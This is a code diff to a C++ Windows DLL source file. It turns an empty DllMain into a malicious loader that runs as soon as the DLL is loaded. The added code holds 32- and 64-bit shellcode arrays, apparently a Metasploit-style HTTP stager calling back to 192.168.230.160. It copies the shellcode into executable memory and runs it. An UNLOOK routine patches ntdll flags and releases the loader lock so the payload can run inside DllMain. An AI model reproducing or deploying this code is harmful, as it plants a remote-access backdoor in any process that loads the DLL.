| skipped 1 lines |
2 | 2 | | |
3 | 3 | | #include "export.hpp" |
4 | 4 | | |
5 | | - | BOOL APIENTRY DllMain( HMODULE hModule, |
6 | | - | DWORD ul_reason_for_call, |
7 | | - | LPVOID lpReserved |
8 | | - | ) |
| 5 | + | void runShellcode() { |
| 6 | + | #ifdef _WIN64 |
| 7 | + | unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x77\x62\x33\x51\x00\xbe\x54\x9b\xd2\x7c\xfa\x60\x3e\xf5\x66\xf0\x09\xea\x24\x0f\xba\x3f\x08\x24\xf9\x38\x21\xe0\x96\x96\xd8\x89\x1e\x48\x7c\xa1\xf9\xd9\xcc\x90\x0e\x6f\xd5\x45\x57\x5b\xfb\xdb\xa3\x70\x03\xb0\xee\xeb\xd9\x79\x98\x45\x23\xba\x64\x8a\x94\x74\x50\x18\xdc\xc1\x2b\x20\x0d\x12\x0d\xe7\xa8\x97\x83\x2e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x6d\x73\x6e\x20\x4f\x70\x74\x69\x6d\x69\x7a\x65\x64\x49\x45\x38\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x71\xd2\x43\x20\x55\x08\xd3\x23\x34\xfc\xd2\xd1\xe2\x4f\xec\x22\x44\xc6\x9d\x09\xba\x8b\x26\x94\x39\xfb\xac\x61\xc8\xf8\x04\x70\x46\x24\xda\xb4\x08\x0b\xd2\x41\x5d\x26\xc9\x5c\xdf\xd3\xb4\x5c\x4d\x3a\xa4\x8c\x02\x64\x8c\xfb\xc7\x13\xb4\xb6\xdc\x3a\xef\x24\x38\x22\xb2\x88\x05\xc4\x50\x26\x1d\xb5\x02\x11\x31\xdb\x03\xc1\xf4\xb5\xe7\x8b\x84\x82\xea\xca\xad\xd9\x1e\x3f\xe2\x56\x79\xc7\xd8\x45\x13\xd4\x68\x50\xf9\x5f\x73\x5b\xf2\xb3\x67\x66\xec\x43\xb7\x41\x14\x6b\x0c\xcc\x26\x23\x3f\x86\x3a\xc1\x36\x0e\x9e\x74\xb0\x54\x2b\x4f\xa4\x6f\x75\x9e\xb6\x0b\x57\xa9\xf1\x79\x49\x32\xe5\xf2\x0a\xa9\x6a\x0e\xbe\x15\xd1\x2e\x53\x8d\x29\x3e\xb5\x90\xda\x81\x9c\xfa\x2f\x4c\xd0\x2d\xae\xdb\x13\x1c\xbf\x79\x4a\x6f\x5a\xe9\x62\x4b\x75\xeb\x19\xc8\xb2\x1b\x94\x32\xcb\xab\x62\x24\xf0\x81\x8e\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x30\x2e\x31\x36\x30\x00\x27\xbc\x86\xaa"; |
| 8 | + | #else |
| 9 | + | unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x33\x4c\x65\x78\x00\x1e\x2a\x49\x6f\x20\xa4\x24\x44\x23\xc5\x0f\xee\x14\x50\x02\xcd\x9c\x65\x33\xae\x94\xd0\x66\x47\x44\x06\xb2\x4a\xb6\xe0\xf8\x75\xb4\x21\x57\xb8\x8c\x10\xe5\xe3\x1e\xb6\xf6\xab\x3c\x72\xc6\x88\xcc\xe4\x82\xc9\x2d\xd8\x30\x70\x58\x93\x4b\x02\x38\xcb\xd0\x75\x60\x8e\xf7\x25\x37\x08\xcb\x29\x5e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x29\x0d\x0a\x00\xfc\xc9\x44\x0c\xbb\x1e\x52\x72\x6f\x37\xf0\x38\x19\x4f\x76\x23\xef\xcc\x2d\xb2\xed\x0c\x1f\x6b\xc4\xa3\xe3\x1d\x5b\x72\xcc\x44\x57\xbc\x26\x36\x37\x7b\xae\x4b\x30\xed\x07\x07\x0b\x96\xe7\xfe\xbf\xac\x68\xe6\xb5\x4b\x99\x53\x7e\x3f\x9e\x92\x53\xcf\x77\x90\x85\x62\xe5\x36\x90\xe8\x42\xb6\x1b\xee\xed\x22\x81\xb5\x68\x31\x09\xdf\x74\x72\x56\xbb\xb7\xd0\x24\x26\x2c\xd1\x81\x72\x07\x90\xb6\x34\x55\xcc\x78\xd8\x61\x2c\xb5\x70\x50\x08\xb9\xd4\x3a\x89\xbf\xd2\x34\xee\x02\x5d\xf5\xe8\xf8\xd6\x2a\x96\x19\x8a\x7e\x14\x1a\x4e\xbd\x58\xf2\x5c\x6e\xd5\x7e\x08\x1b\x1f\x3d\xd9\xde\xf5\xee\x4e\x80\x1f\xa7\x97\x31\x0c\x34\x6a\xa2\x09\x20\xad\x34\x66\xc4\x6d\x81\x84\x68\x93\x6a\x8c\xc4\xee\xb7\x52\x11\xa0\xb4\x74\xd8\x21\x86\xb8\x4e\x0c\x94\x85\x60\x24\x0a\x67\x20\x8d\x59\x18\x24\x82\xb1\x00\x58\x28\xd0\x78\x15\x35\x4b\x86\x76\x0b\x68\x04\x4b\xf3\xb2\xce\x1f\x0a\x6d\x23\x63\x90\x5e\x10\x14\xab\x67\xe4\x36\x25\xe8\xe6\xc9\x8e\xeb\x22\xfb\x1c\x4d\x9c\x17\x9e\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x30\x2e\x31\x36\x30\x00\x27\xbc\x86\xaa"; |
| 10 | + | #endif |
| 11 | + | |
| 12 | + | LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, 0x40); |
| 13 | + | |
| 14 | + | memcpy(shellcode, buf, sizeof(buf)); |
| 15 | + | |
| 16 | + | void(*func)(); |
| 17 | + | func = (void(*)())shellcode; |
| 18 | + | func(); |
| 19 | + | } |
| 20 | + | |
| 21 | + | typedef struct _LSA_UNICODE_STRING { |
| 22 | + | USHORT Length; |
| 23 | + | USHORT MaximumLength; |
| 24 | + | PWSTR Buffer; |
| 25 | + | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING; |
| 26 | + | typedef struct _STRING { |
| 27 | + | USHORT Length; |
| 28 | + | USHORT MaximumLength; |
| 29 | + | PCHAR Buffer; |
| 30 | + | } ANSI_STRING, * PANSI_STRING; |
| 31 | + | |
| 32 | + | typedef struct _PEB_LDR_DATA { |
| 33 | + | ULONG Length; |
| 34 | + | ULONG Initialized; |
| 35 | + | PVOID SsHandle; |
| 36 | + | LIST_ENTRY InLoadOrderModuleList; |
| 37 | + | LIST_ENTRY InMemoryOrderModuleList; |
| 38 | + | LIST_ENTRY InInitializationOrderModuleList; |
| 39 | + | } PEB_LDR_DATA, * PPEB_LDR_DATA; |
| 40 | + | typedef struct _CURDIR { |
| 41 | + | UNICODE_STRING DosPath; |
| 42 | + | PVOID Handle; |
| 43 | + | }CURDIR, * PCURDIR; |
| 44 | + | typedef struct _RTL_DRIVE_LETTER_CURDIR { |
| 45 | + | WORD Flags; |
| 46 | + | WORD Length; |
| 47 | + | ULONG TimeStamp; |
| 48 | + | ANSI_STRING DosPath; |
| 49 | + | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; |
| 50 | + | |
| 51 | + | typedef struct _RTL_USER_PROCESS_PARAMETERS { |
| 52 | + | ULONG MaximumLength; |
| 53 | + | ULONG Length; |
| 54 | + | ULONG Flags; |
| 55 | + | ULONG DebugFlags; |
| 56 | + | PVOID ConsoleHandle; |
| 57 | + | ULONG ConsoleFlags; |
| 58 | + | PVOID StandardInput; |
| 59 | + | PVOID StandardOutput; |
| 60 | + | PVOID StandardError; |
| 61 | + | CURDIR CurrentDirectory; |
| 62 | + | UNICODE_STRING DllPath; |
| 63 | + | UNICODE_STRING ImagePathName; |
| 64 | + | UNICODE_STRING CommandLine; |
| 65 | + | PVOID Environment; |
| 66 | + | ULONG StartingX; |
| 67 | + | ULONG StartingY; |
| 68 | + | ULONG CountX; |
| 69 | + | ULONG CountY; |
| 70 | + | ULONG CountCharsX; |
| 71 | + | ULONG CountCharsY; |
| 72 | + | ULONG FillAttribute; |
| 73 | + | ULONG WindowFlags; |
| 74 | + | ULONG ShowWindowFlags; |
| 75 | + | UNICODE_STRING WindowTitle; |
| 76 | + | UNICODE_STRING DesktopInfo; |
| 77 | + | UNICODE_STRING ShellInfo; |
| 78 | + | UNICODE_STRING RuntimeData; |
| 79 | + | RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32]; |
| 80 | + | ULONG EnvironmentSize; |
| 81 | + | }RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; |
| 82 | + | |
| 83 | + | typedef struct _PEB { |
| 84 | + | BOOLEAN InheritedAddressSpace; |
| 85 | + | BOOLEAN ReadImageFileExecOptions; |
| 86 | + | BOOLEAN BeingDebugged; |
| 87 | + | BOOLEAN Spare; |
| 88 | + | HANDLE Mutant; |
| 89 | + | PVOID ImageBase; |
| 90 | + | PPEB_LDR_DATA LoaderData; |
| 91 | + | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; |
| 92 | + | PVOID SubSystemData; |
| 93 | + | PVOID ProcessHeap; |
| 94 | + | PVOID FastPebLock; |
| 95 | + | PVOID FastPebLockRoutine; |
| 96 | + | PVOID FastPebUnlockRoutine; |
| 97 | + | ULONG EnvironmentUpdateCount; |
| 98 | + | PVOID* KernelCallbackTable; |
| 99 | + | PVOID EventLogSection; |
| 100 | + | PVOID EventLog; |
| 101 | + | PVOID FreeList; |
| 102 | + | ULONG TlsExpansionCounter; |
| 103 | + | PVOID TlsBitmap; |
| 104 | + | ULONG TlsBitmapBits[0x2]; |
| 105 | + | PVOID ReadOnlySharedMemoryBase; |
| 106 | + | PVOID ReadOnlySharedMemoryHeap; |
| 107 | + | PVOID* ReadOnlyStaticServerData; |
| 108 | + | PVOID AnsiCodePageData; |
| 109 | + | PVOID OemCodePageData; |
| 110 | + | PVOID UnicodeCaseTableData; |
| 111 | + | ULONG NumberOfProcessors; |
| 112 | + | ULONG NtGlobalFlag; |
| 113 | + | BYTE Spare2[0x4]; |
| 114 | + | LARGE_INTEGER CriticalSectionTimeout; |
| 115 | + | ULONG HeapSegmentReserve; |
| 116 | + | ULONG HeapSegmentCommit; |
| 117 | + | ULONG HeapDeCommitTotalFreeThreshold; |
| 118 | + | ULONG HeapDeCommitFreeBlockThreshold; |
| 119 | + | ULONG NumberOfHeaps; |
| 120 | + | ULONG MaximumNumberOfHeaps; |
| 121 | + | PVOID** ProcessHeaps; |
| 122 | + | PVOID GdiSharedHandleTable; |
| 123 | + | PVOID ProcessStarterHelper; |
| 124 | + | PVOID GdiDCAttributeList; |
| 125 | + | PVOID LoaderLock; |
| 126 | + | ULONG OSMajorVersion; |
| 127 | + | ULONG OSMinorVersion; |
| 128 | + | ULONG OSBuildNumber; |
| 129 | + | ULONG OSPlatformId; |
| 130 | + | ULONG ImageSubSystem; |
| 131 | + | ULONG ImageSubSystemMajorVersion; |
| 132 | + | ULONG ImageSubSystemMinorVersion; |
| 133 | + | ULONG GdiHandleBuffer[0x22]; |
| 134 | + | ULONG PostProcessInitRoutine; |
| 135 | + | ULONG TlsExpansionBitmap; |
| 136 | + | BYTE TlsExpansionBitmapBits[0x80]; |
| 137 | + | ULONG SessionId; |
| 138 | + | } PEB, * PPEB; |
| 139 | + | |
| 140 | + | PPEB GetPeb(VOID) |
| 141 | + | { |
| 142 | + | #if defined(_WIN64) |
| 143 | + | return (PPEB)__readgsqword(0x60); |
| 144 | + | #elif defined(_WIN32) |
| 145 | + | return (PPEB)__readfsdword(0x30); |
| 146 | + | #endif |
| 147 | + | } |
| 148 | + | |
| 149 | + | size_t memFind(BYTE* mem, BYTE* search, size_t memSize, size_t length) |
| 150 | + | { |
| 151 | + | size_t end = length - 1; |
| 152 | + | size_t begin = 0; |
| 153 | + | BOOL tmp; |
| 154 | + | |
| 155 | + | if (memSize < size_t(mem)) { |
| 156 | + | //反向搜索 |
| 157 | + | for (size_t i = 0; size_t(mem) - i >= memSize; i++) |
| 158 | + | { |
| 159 | + | tmp = TRUE; |
| 160 | + | |
| 161 | + | while (begin <= end) |
| 162 | + | { |
| 163 | + | if ((search[begin] != 0xFF && *(mem - i + begin) != search[begin]) || (search[end] != 0xFF && *(mem - i + end) != search[end])) |
| 164 | + | { |
| 165 | + | tmp = FALSE; |
| 166 | + | break; |
| 167 | + | } |
| 168 | + | |
| 169 | + | begin++; |
| 170 | + | } |
| 171 | + | if (tmp) |
| 172 | + | return size_t(mem) - i; |
| 173 | + | else |
| 174 | + | begin = 0; |
| 175 | + | } |
| 176 | + | } |
| 177 | + | else { |
| 178 | + | for (size_t i = 0; i + size_t(mem) < memSize; i++) |
| 179 | + | { |
| 180 | + | tmp = TRUE; |
| 181 | + | |
| 182 | + | while (begin <= end) |
| 183 | + | { |
| 184 | + | if ((search[begin] != 0xFF && *(mem + i + begin) != search[begin]) || (search[end] != 0xFF && *(mem + i + end) != search[end])) |
| 185 | + | { |
| 186 | + | tmp = FALSE; |
| 187 | + | break; |
| 188 | + | } |
| 189 | + | |
| 190 | + | begin++; |
| 191 | + | } |
| 192 | + | if (tmp) |
| 193 | + | return size_t(mem) + i; |
| 194 | + | else |
| 195 | + | begin = 0; |
| 196 | + | } |
| 197 | + | } |
| 198 | + | |
| 199 | + | return 0; |
| 200 | + | } |
| 201 | + | |
| 202 | + | size_t GetSkipFileAPIBrokering(VOID) |
| 203 | + | { |
| 204 | + | #if defined(_WIN64) |
| 205 | + | return __readgsqword(0x30) + 0x17EE; |
| 206 | + | #elif defined(_WIN32) |
| 207 | + | return __readfsdword(0x18) + 0xFCA; |
| 208 | + | #endif |
| 209 | + | } |
| 210 | + | |
| 211 | + | #ifdef _WIN64 |
| 212 | + | unsigned char lock_count_flag[] = { 0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00 }; |
| 213 | + | #else |
| 214 | + | unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8}; |
| 215 | + | #endif |
| 216 | + | |
| 217 | + | VOID UNLOOK() |
| 218 | + | { |
| 219 | + | HMODULE base = GetModuleHandleA("ntdll.dll"); |
| 220 | + | PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)base; |
| 221 | + | DWORD size_of_img; |
| 222 | + | |
| 223 | + | if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC){ |
| 224 | + | PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew); |
| 225 | + | PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader; |
| 226 | + | |
| 227 | + | size_of_img = pOH32->SizeOfImage; |
| 228 | + | } |
| 229 | + | else { |
| 230 | + | PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew); |
| 231 | + | PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader; |
| 232 | + | |
| 233 | + | size_of_img = pOH64->SizeOfImage; |
| 234 | + | } |
| 235 | + | |
| 236 | + | //适用于win7以上的系统,需要格外修改值 |
| 237 | + | size_t addr = memFind((BYTE*)base, lock_count_flag, (size_t)base + size_of_img, sizeof(lock_count_flag)); |
| 238 | + | Sleep(1); |
| 239 | + | if (addr != 0) |
| 240 | + | { |
| 241 | + | #ifdef _WIN64 |
| 242 | + | addr = (size_t)addr + 0x15; |
| 243 | + | addr = addr + 5 + *(PDWORD)addr; |
| 244 | + | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
| 245 | + | #else |
| 246 | + | addr = (size_t)addr + 0xe; |
| 247 | + | addr = *(PDWORD)addr; |
| 248 | + | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
| 249 | + | #endif |
| 250 | + | |
| 251 | + | size_t skipFileAPIBrokeringAddr = GetSkipFileAPIBrokering(); |
| 252 | + | (*(PWORD)skipFileAPIBrokeringAddr) = (*(PWORD)skipFileAPIBrokeringAddr) & 0xEFFF; |
| 253 | + | } |
| 254 | + | |
| 255 | + | PPEB Peb = GetPeb(); |
| 256 | + | HMODULE hModule = GetModuleHandleA("ntdll.dll"); |
| 257 | + | if (hModule == NULL) |
| 258 | + | return; |
| 259 | + | |
| 260 | + | typedef NTSTATUS(NTAPI* RTLLEAVECRITICALSECTION)(PRTL_CRITICAL_SECTION CriticalSection); |
| 261 | + | |
| 262 | + | RTLLEAVECRITICALSECTION RtlLeaveCriticalSection = NULL; |
| 263 | + | |
| 264 | + | RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress((HMODULE)hModule, "RtlLeaveCriticalSection"); |
| 265 | + | |
| 266 | + | RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->LoaderLock); |
| 267 | + | } |
| 268 | + | |
| 269 | + | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) |
9 | 270 | | { |
10 | 271 | | switch (ul_reason_for_call) |
11 | 272 | | { |
12 | 273 | | case DLL_PROCESS_ATTACH: |
13 | | - | //exit(0x1D7F9D44); |
14 | | - | case DLL_THREAD_ATTACH: |
15 | | - | case DLL_THREAD_DETACH: |
16 | | - | case DLL_PROCESS_DETACH: |
17 | | - | break; |
| 274 | + | UNLOOK(); |
| 275 | + | |
| 276 | + | runShellcode(); |
18 | 277 | | } |
19 | 278 | | return TRUE; |
20 | 279 | | } |
21 | 280 | | |
22 | | - | |